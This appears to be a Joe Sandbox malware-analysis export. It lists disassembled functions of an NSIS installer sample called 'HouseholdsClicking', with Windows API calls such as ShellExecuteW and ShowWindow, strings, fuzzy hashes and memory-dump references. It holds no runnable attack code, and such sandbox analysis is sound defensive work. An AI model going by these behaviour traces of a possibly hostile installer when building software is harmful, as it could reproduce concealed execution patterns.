Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$AttributesCountCreateModuleNameSizeTick
String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
API String ID: 4283519449-527102705
Opcode ID: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction ID: dd9ffda97dac1e18d9081c595fe0b3a994810ea71df15e1d022794f6b5594c79
Opcode Fuzzy Hash: 1c468bae64f21cc984bb13b12bce4b19fca03feff63e1d2e4bd855413efb252c
Instruction Fuzzy Hash: 8551B8B1900214AFDB20DFA5DC85B9E7EACAB1435AF60857BF905B72D1C7389E408B5C

Function 00404F9E Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00426979,74DF23A0,00000000), ref: 00406902

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction ID: 2ad3572104664f977ebc3f2c903ed8e4223e657edd1a0c85de02785a0cf57670
Opcode Fuzzy Hash: 3275530aef0c04b4202250623e45ea8dce7054cefbb9f1e0f944281260c15b48
Instruction Fuzzy Hash: CD219DB1800518BBDF119F65CD849CFBFB9EF45714F10803AF905B22A1C7794A909B98

Function 00402713 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042

WritePrivateProfileStringW.KERNEL32(?,?,?,00000000), ref: 0040278C

Strings

<RM>, xrefs: 00402713
TournamentsDefenceBerry, xrefs: 00402770
WriteINIStr: wrote [%s] %s=%s in %s, xrefs: 00402775

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: PrivateProfileStringWritelstrcpyn
String ID: <RM>$TournamentsDefenceBerry$WriteINIStr: wrote [%s] %s=%s in %s
API String ID: 247603264-1902620211
Opcode ID: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction ID: 073f588d32262f2f2aee4dc53e9f390c64699363c3e1a285ed73a3087a8005e5
Opcode Fuzzy Hash: c5828c37d5dac6f57dc8390ef1c26791cf4c32ef29eebf51540eb2f0813f71ea
Instruction Fuzzy Hash: FF014471D4022AABCB117FA68DC99EE7978AF08345B10403FF115761E3D7B80940CBAD

Function 004021B5 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 54
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00426979,74DF23A0,00000000), ref: 00404FD6
Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FE6
Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00426979,74DF23A0,00000000), ref: 00404FF9
Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
Part of subcall function 00404F9E: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405059

ShellExecuteW.SHELL32(?,00000000,00000000,00000000,004D70B0,?), ref: 00402202

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

Strings

ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d, xrefs: 00402211
ExecShell: success ("%s": file:"%s" params:"%s"), xrefs: 00402226

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSendlstrlen$ExecuteShellTextWindowlstrcatwvsprintf
String ID: ExecShell: success ("%s": file:"%s" params:"%s")$ExecShell: warning: error ("%s": file:"%s" params:"%s")=%d
API String ID: 3156913733-2180253247
Opcode ID: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction ID: 745ed8f2a75272e62c3db2eabdadd847eb541a5ed47e1f4d533bb28834579f01
Opcode Fuzzy Hash: 90e3c086b79b93c3d546270fca5f8a0155083991d9bd97c4b180a1ab42e6237a
Instruction Fuzzy Hash: CD01F7B2B4021076D72076B69C87FAB2A5CDB81768B20447BF502F60D3E57D8C40D138

Function 00405EAB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00405EC9
GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,0040382A,004DF0C0,004E30C8), ref: 00405EE4

Strings

nsa, xrefs: 00405EB8

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CountFileNameTempTick
String ID: nsa
API String ID: 1716503409-2209301699
Opcode ID: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction ID: e8a8b8b1c64af8904643f6899c21fc71a506a3659d4cdc328e790c9301f5e3ed
Opcode Fuzzy Hash: 4f25573a167f5d7e94ef3749a48273d52f629be49305b635a70712ae5e4e57be
Instruction Fuzzy Hash: D8F09076600208BBDB10CF69DD05A9FBBBDEF95710F00803BE944E7250E6B09E50DB98

Function 00402175 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 28
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShowWindow.USER32(00000000,00000000), ref: 0040219F

Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3

EnableWindow.USER32(00000000,00000000), ref: 004021AA

Strings

HideWindow, xrefs: 0040218D

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Window$EnableShowlstrlenwvsprintf
String ID: HideWindow
API String ID: 1249568736-780306582
Opcode ID: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction ID: f8c041d4f94449417b74c9df8c85987c6128e61f091d6cc810bdb42da7a8293a
Opcode Fuzzy Hash: 4821ec273fe2e599a5ae382fcc080c7bd17c9037b2f84cac4d1a2c1341ad8622
Instruction Fuzzy Hash: 13E0D832A04110DBDB08FFF5A64959E76B4EE9532A72104BFE103F61D2DA7D4D01C62D

Function 0040139D Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013F6
SendMessageW.USER32(00000402,00000402,00000000), ref: 00401406

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction ID: 11189a7010c7ef4f551f6273c6f502c25af520ce36bbf29b1e3929f99495605f
Opcode Fuzzy Hash: 0bd6c5a8fdcdf2cf9a6bba33cc7502a6d80b6dcfa2a0e894e00c73e73fb262d4
Instruction Fuzzy Hash: 64F02831A10220DBD7165B349C08B273799BB81354F258637F819F62F2D2B8CC41CB4C

Function 00405E7C Relevance: 3.0, APIs: 2, Instructions: 15fileCOMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction ID: 4537c79132fc6b4e07af9f6f4ddc5e1db4475248beafdc935845b7fb5ee8fdc2
Opcode Fuzzy Hash: ea37a1a334eaa57c44c9ac3bd50a12c4681d8f83bf4f6bb47fe7ae46db9ee3b5
Instruction Fuzzy Hash: 08D09E71558202EFEF098F60DD1AF6EBBA2EB94B00F11852CB252550F1D6B25819DB15

Function 00405E5C Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406EAD,?,?,?), ref: 00405E60
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E73

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction ID: cfdb79520ecdf627421b2718222ef799ef1344ba1afc56e39be72dea6d7b0432
Opcode Fuzzy Hash: 5e2af4692c2c60a0182b675181584894d3553f063f17430bbe0abaa40064c643
Instruction Fuzzy Hash: 25C04C71404905BBDA015B34DE09D1BBB66EFA1331B648735F4BAE01F1C7358C65DA19

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033D2,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction ID: 6ac59f4cb3fe35c1316d0bdd9a7bfda3bd496f009ebd6252a63c396af269f63e
Opcode Fuzzy Hash: f617a5e021c5b0a319d386adb8c185e40962a0be4c43712b9beeddd23e90c427
Instruction Fuzzy Hash: 17E08C32650118FFDB109EA69C84EE73B5CFB047A2F00C432BD55E5190DA30DA00EBA4

Function 004037F8 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF

CreateDirectoryW.KERNELBASE(004E30C8,00000000,004E30C8,004E30C8,004E30C8,-00000002,00403A37), ref: 00403819

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction ID: c72586207ca4fe3275e323c6ce7a55902ce0015f7edb1a19efdc0f2786dab76c
Opcode Fuzzy Hash: ec387b52da79c0d7c7db124e40c02042f93ac80872f0e6df2e3daec6660af043
Instruction Fuzzy Hash: 52D0921218293121C66237663D0ABCF195C4F92B2EB0280B7F942B61D69B6C4A9285EE

Function 00403DDB Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DED

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction ID: 85c9fcbfeeb581dd75f9c62538f5ff43d76368f59f1a6e3d2bff8e12452ff276
Opcode Fuzzy Hash: bd6570ef2729c24474e20ae8e5d55f292f33ecedeb6df88af58882e0072056a2
Instruction Fuzzy Hash: 0FC04C75644201BBDA108B509D45F077759AB90701F1584257615F50E0C674D550D62C

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403786,?,?,?,?,00000000,00403A73,?), ref: 00403376

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction ID: a45aac6c24818fd8413ddab5752014fb5f73d741524c96ff6ff4c62981ea4fba
Opcode Fuzzy Hash: 4bc311ea945a84079b9d2f50dcaf6257f2c75df5904c01363540678bd5f9aa8d
Instruction Fuzzy Hash: 83B01231640200FFEA214F50DE09F06BB21B794700F208430B350380F082711820EB0C

Function 00403DC4 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction ID: 19f7ed481b0b3084dfc48602985d3e47af739273f13ec77122cd0735a5794091
Opcode Fuzzy Hash: 4d265d85d83b9aee7a2860bb21ac42a33598db5d2fcd0833c625a930327cbe25
Instruction Fuzzy Hash: CCB01235181200BBDE514B00DE0AF867F62F7A8701F008574B305640F0C6B204E0DB09

Function 00403DB1 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,00405779), ref: 00403DBB

Memory Dump Source

Source File: 00000000.00000002.1733254903.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1733136549.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733377382.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733413971.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1733601939.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_HouseholdsClicking.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19

Non-executed Functions

Function 004049A8 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 004049BF
GetDlgItem.USER32(?,00000408), ref: 004049CC
GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
LoadBitmapW.USER32(0000006E), ref: 00404A2E
SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
DeleteObject.GDI32(?), ref: 00404AA5
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
ShowWindow.USER32(?,00000005), ref: 00404BFB
